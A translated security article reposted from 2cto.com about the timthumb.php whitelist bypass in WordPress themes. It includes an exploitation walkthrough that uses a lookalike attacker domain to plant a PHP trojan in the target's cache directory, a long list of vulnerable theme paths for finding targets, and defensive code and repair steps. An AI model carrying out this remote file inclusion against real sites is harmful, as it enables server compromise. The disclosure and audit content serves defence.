2cto.com editor's note: this is not a new article, but it was not yet on the site, so it is reposted here for reference.
timthumb.php is a very popular WordPress thumbnail script. It is bundled with a number of well-known foreign themes, such as those from WooThemes.
The vulnerability stems from the fact that timthumb ships with a default whitelist of well-known image-hosting sites such as Flickr and Picasa. The check that validates a remote image URL against this whitelist is flawed: a URL on a domain such as "http://flickr.com.yourdomain.com" is accepted as if it were flickr.com, which is enough to get PHP code fetched onto the target and executed there. In other words, if your theme uses timthumb.php to generate thumbnails dynamically, an attacker can use this flaw to place arbitrary malicious files in the image cache directory that timthumb.php defines. The relevant code is:
// external domains that are allowed to be displayed on your website
$allowedSites = array (
	'flickr.com',
	'picasa.com',
	'blogger.com',
	'wordpress.com',
	'img.youtube.com',
);
Affected Versions: 1.14-1.32
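To make the flaw concrete, here is an added example written for this page; it is not timthumb's own source. It places a substring-style whitelist check of the kind described above beside a check on the parsed host name that does not have the problem. The input URLs are constructed: yourdomain.com stands in for any attacker-controlled domain, and flickr.com.yourdomain.com is the bypass host the article describes.

```php
<?php
// Added example, not timthumb's own code. Compares a substring-style
// whitelist check (the weak pattern behind the bypass) with a check on the
// parsed host name. Run from the command line: php whitelist_check.php

$allowedSites = array(
    'flickr.com',
    'picasa.com',
    'blogger.com',
    'wordpress.com',
    'img.youtube.com',
);

// Weak check: a whitelisted name only has to appear somewhere in the URL.
// "flickr.com.yourdomain.com" contains "flickr.com", so it is accepted.
function is_allowed_substring($src, array $allowedSites)
{
    foreach ($allowedSites as $site) {
        if (stripos($src, $site) !== false) {
            return true;
        }
    }
    return false;
}

// Hardened check: parse the URL, look only at the host component, and accept
// it only when it equals a whitelisted name or ends in "." followed by one.
// "flickr.com.yourdomain.com" ends in ".yourdomain.com", so it is rejected.
function is_allowed_host($src, array $allowedSites)
{
    $parts = parse_url($src);
    if ($parts === false || empty($parts['host']) || empty($parts['scheme'])) {
        return false;
    }
    if (!in_array(strtolower($parts['scheme']), array('http', 'https'), true)) {
        return false;
    }
    $host = strtolower($parts['host']);
    foreach ($allowedSites as $site) {
        $site   = strtolower($site);
        $suffix = '.' . $site;
        if ($host === $site
            || (strlen($host) > strlen($suffix)
                && substr($host, -strlen($suffix)) === $suffix)) {
            return true;
        }
    }
    return false;
}

// Constructed inputs: yourdomain.com stands in for any attacker-controlled name.
$samples = array(
    'http://farm1.flickr.com/123/photo.jpg',           // real subdomain of flickr.com
    'http://flickr.com.yourdomain.com/x.php',          // the bypass described in the article
    'http://yourdomain.com/flickr.com/x.php',          // whitelisted name in the path
    'http://yourdomain.com/x.php?ref=img.youtube.com', // whitelisted name in the query
);

foreach ($samples as $src) {
    printf("%-50s substring:%-5s host:%s\n", $src,
        is_allowed_substring($src, $allowedSites) ? 'PASS' : 'deny',
        is_allowed_host($src, $allowedSites) ? 'PASS' : 'deny');
}
```

Only the first sample passes the host check; the substring check accepts all four, because the whitelisted name appears in the host, the path or the query string. Matching on the parsed host closes the bypass described above, but it does not by itself make fetching remote files safe: a safe version must also verify that the downloaded content really is an image before caching it, and the cache directory should not be able to execute PHP at all (repair method 3 in the summary below).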
Although this vulnerability has been public for some time, many newcomers like me still do not know how it is exploited, so I will summarize my own experience here.
I. Preparations
Conditions to be met:
1. The target WordPress site has a vulnerable timthumb.php installed. Taking the canvas theme as an example, the script is found at
http://<target website domain>/wp-content/themes/canvas/timthumb.php
or
http://<target website domain>/wp-content/themes/canvas/thumb.php
2. Set up a website on a third-level domain with an address such as
http://flickr.com.<your domain>.com
or
http://picasa.com.<your domain>.com
and place the trojan there.
3. I did not pay attention to this condition at first: the hosting space must not be able to execute PHP. Otherwise the trojan is executed there, and the file that ends up on the target website is not the source file but the output of running it.
II. Finding target websites
This script is probably rare on sites in China, but a great many WordPress themes used abroad ship it. For example, it is found at theme paths such as:
8q/scripts/timthumb.php
aerial/lib/timthumb.php
aesthete/timthumb.php
albizia/shortdes/timthumb.php
amphion-lite/script/timthumb.php
aqua-blue/shortdes/timthumb.php
arantings/scripts/timthumb.php
arras/library/timthumb.php
arras-theme/library/timthumb.php
arthur emix-bronze/scripts/timthumb.php
arthur emix-green/scripts/timthumb.php
artisan/shortdes/timthumb.php
a-simple-business-theme/scripts/timthumb.php
a-supercms/timthumb.php
aureola/scripts/timthumb.php
Export Rae/timthumb.php
autofashion/thumb.php
automotive-blog-theme/Quick Cash Auto/timthumb.php
automotive-blog-theme/timthumb.php
bikes/thumb.php
black_eve/timthumb.php
blex/scripts/timthumb.php
bloggnorge-a1/scripts/timthumb.php
blogified/timthumb.php
blue-effecate-hyve-theme/timthumb.php
bluemag/library/timthumb.php
blue-news/scripts/timthumb.php
bombax/DES/timthumb.php
breakingnewz/timthumb.php
brightsky/scripts/timthumb.php
brochure-melbourne/DES/timthumb.php
business-turnkey/assets/js/timthumb.php
calotropis/DES/timthumb.php
coffee-lite/thumb.php
comet/scripts/timthumb.php
conceditor-wp-strict/scripts/timthumb.php
constructor/layouts/thumb.php
constructor/libs/timthumb.php
constructor/timthumb.php
coverht-wp/scripts/timthumb.php
cover-wp/scripts/timthumb.php
dark-dream-media/timthumb.php
deep-blue/timthumb.php
delicate/thumb.php
diamond-ray/thumb.php
dieselclothings/thumb.php
digitalblue/thumb.php
dimenzion/timthumb.php
epione/script/timthumb.php
evr-green/scripts/timthumb.php
famous/shortframe/megapanel/inc/upload.php
famous/timthumb.php
fashion-style/thumb.php
featuring/timthumb.php
fliphoto/timthumb.php
examples/timthumb.php
fordreporter/scripts/thumb.php
freeside/thumb.php
fresh-blu/scripts/timthumb.php
go-green/modules/timthumb.php
granite-lite/scripts/timthumb.php
greydove/timthumb.php
greyzed/functions/efrog/lib/timthumb.php
gunungkidul/thumb.php
heartspotting-beta/thumb.php
heli-1-wordpress-theme/images/timthumb.php
ideatheme/timthumb.php
impressio/timthumb.php
introvert/thumb.php
inuit-types/thumb.php
isotherm-news/thumb.php
iwana-v10/timthumb.php
jambo/thumb.php
jcblackone/thumb.php
kratalistic/thumb.php
life-style-free/thumb.php
likehacker/timthumb.php
litepress/scripts/timthumb.php
loganpress-premium-theme-1/thumb.php
magazine-basic/thumb.php
magup/timthumb.php
make-money-online-theme-1/scripts/timthumb.php
make-money-online-theme-2/scripts/timthumb.php
make-money-online-theme-3/scripts/timthumb.php
make-money-online-theme-4/scripts/timthumb.php
make-money-online-theme/scripts/timthumb.php
meintest/layouts/thumb.php
mobilephonecomparision/thumb.php
moi-magazine/timthumb.php
my-heli/images/timthumb.php
mymag/timthumb.php
mystique/extensions/auto-thumb/timthumb.php
nash/theme-assets/php/timthumb.php
neofresh/timthumb.php
neo_wdl/schemdes/extensions/thumb.php
new-green-natural-living-ngnl/scripts/timthumb.php
newspress/thumb.php
pearlie/scripts/timthumb.php
pico/scripts/timthumb.php
postage-sysydney/shortdes/timthumb.php
premium-violet/thumb.php
probluezine/timthumb.php
pronto/cjl/pronto/uploadify/check.php
pronto/cjl/pronto/uploadify.php
r755/thumb.php
regal/timthumb.php
shaan/timthumb.php
shadow-block/thumb.php
shadow/timthumb.php
simple-but-great/timthumb.php
simplenews_premium/scripts/timthumb.php
simple-red-theme/timthumb.php
simple-tabloid/thumb.php
simplewhite/timthumb.php
sshortette/timThumb/timthumb.php
snowblind_colbert/thumb.php
snowblind/thumb.php
spotlight/timthumb.php
squeezepage/timthumb.php
standout/thumb.php
suffusion/timthumb.php
swift/DES/thumb.php
swift/DES/timthumb.php
swift/timthumb.php
techozoic-fluid/options/thumb.php
the_dark_ OS/tools/timthumb.php
themetiger-fashion/thumb.php
theory/thumb.php
the-theme/core/libs/thumbnails/thumb.php
thrillingtheme/thumb.php
tm-theme/js/timthumb.php
totallyred/scripts/timthumb.php
travelogue-theme/scripts/timthumb.php
true-blue-theme/timthumb.php
ttnews-theme/timthumb.php
twittplus/scripts/timthumb.php
typographywp/timthumb.php
uugly/timthumb.php
unity/timthumb.php
versitility/timthumb.php
vibefolio-teaser-10/scripts/timthumb.php
vina/thumb.php
whitemag/script/thumb.php
wpapi/thumb.php
wpbus-d4/shortdes/timthumb.php
wp-creativix/scripts/timthumb.php
wp-newsmagazine/scripts/timthumb.php
wp-perfect/js/timthumb.php
wp-premium-orange/timthumb.php
xiando-one/thumb.php
zcool-like/timthumb.php
zcool-like/uploadify.php
III. Exploitation
Enter the following address in the browser:
http://<target website path>/timthumb.php?src=http://flickr.com.<your domain>.com/<trojan name>.php
The trojan can then be reached at
http://<target website path>/cache/external_<md5 value>.php
or
http://<target website path>/temp/external_<md5 value>.php
If the timthumb.php version is earlier than 2.0, the trojan address is
http://<target website path>/cache/<md5 value>.php
Note that the md5 value here is the MD5 of the full source URL, http://flickr.com.<your domain>.com/<trojan name>.php.
IV. Summary
Although the conditions for exploiting this vulnerability are demanding, many WordPress users outside China and a large number of themes use this script, so there are still many websites at risk.
Repair methods:
1. Overwrite the original file with the latest timthumb.php version;
2. Delete the whitelist;
3. Harden the server directory permissions.
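As an added defensive companion to the path list in section II and the repair methods above (not part of timthumb or WordPress), the following PHP command-line script audits a WordPress install for copies of timthumb.php and thumb.php. For each copy it reports the VERSION constant and flags the affected 1.14-1.32 range, checks whether $allowedSites is still populated (repair method 2), and lists any .php file in the cache/ or temp/ directory beside the script, which is where section III says fetched files are written. It assumes each copy declares define('VERSION', '...') and $allowedSites = array(...) as shown at the top of the article; the script name timthumb_audit.php and the path /var/www/html in the usage line are placeholders.

```php
<?php
// Added audit script, not part of timthumb or WordPress.
// Usage: php timthumb_audit.php /var/www/html   (both names are placeholders)
//
// Assumes each copy declares define('VERSION', '...') and
// $allowedSites = array(...), as the copies discussed in the article do.

function audit_timthumb($root)
{
    $results = array();
    $iter = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($iter as $path => $info) {
        $name = strtolower($info->getFilename());
        if ($name !== 'timthumb.php' && $name !== 'thumb.php') {
            continue;
        }
        $src = file_get_contents($path);

        // Version string as declared by the script itself.
        $version = null;
        if (preg_match('/define\s*\(\s*[\'"]VERSION[\'"]\s*,\s*[\'"]([^\'"]+)[\'"]/', $src, $m)) {
            $version = $m[1];
        }
        $affected = $version !== null
            && version_compare($version, '1.14', '>=')
            && version_compare($version, '1.32', '<=');

        // Is the remote-site whitelist still populated?
        if (preg_match('/\$allowedSites\s*=\s*array\s*\(\s*\)/', $src)) {
            $whitelist = 'empty (remote fetching disabled)';
        } elseif (preg_match('/\$allowedSites\s*=\s*array\s*\(/', $src)) {
            $whitelist = 'populated (remote fetching allowed)';
        } else {
            $whitelist = 'not found';
        }

        // The article names cache/ and temp/ as the directories where fetched
        // files are written; a .php file there is a strong sign of abuse.
        $dir = dirname($path);
        $phpInCache = array();
        foreach (array('cache', 'temp') as $sub) {
            $hits = glob($dir . '/' . $sub . '/*.php');
            if ($hits) {
                $phpInCache = array_merge($phpInCache, $hits);
            }
        }

        $results[] = array(
            'file'       => $path,
            'version'    => $version,
            'affected'   => $affected,
            'whitelist'  => $whitelist,
            'phpInCache' => $phpInCache,
        );
    }
    return $results;
}

$root     = isset($argv[1]) ? rtrim($argv[1], '/') : '.';
$findings = audit_timthumb($root);
if (!$findings) {
    echo "No timthumb.php or thumb.php found under $root\n";
}
foreach ($findings as $f) {
    echo $f['file'], "\n";
    echo "  version:   ", ($f['version'] === null ? 'unknown' : $f['version']),
         ($f['affected'] ? '  <-- in the affected range 1.14-1.32' : ''), "\n";
    echo "  whitelist: ", $f['whitelist'], "\n";
    foreach ($f['phpInCache'] as $p) {
        echo "  PHP file in cache directory: ", $p, "\n";
    }
}
```

On a clean install the script reports either no copies at all, or copies whose version lies outside the affected range with an empty whitelist and nothing under cache/ or temp/. A .php file in either directory is evidence that the fetch-and-cache path has already been abused and should be handled as an incident rather than simply deleted; independently of the script version, the web server configuration should deny PHP execution in those directories, which is the practical form of repair method 3.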
From: nuclear'atk Network Security Research Center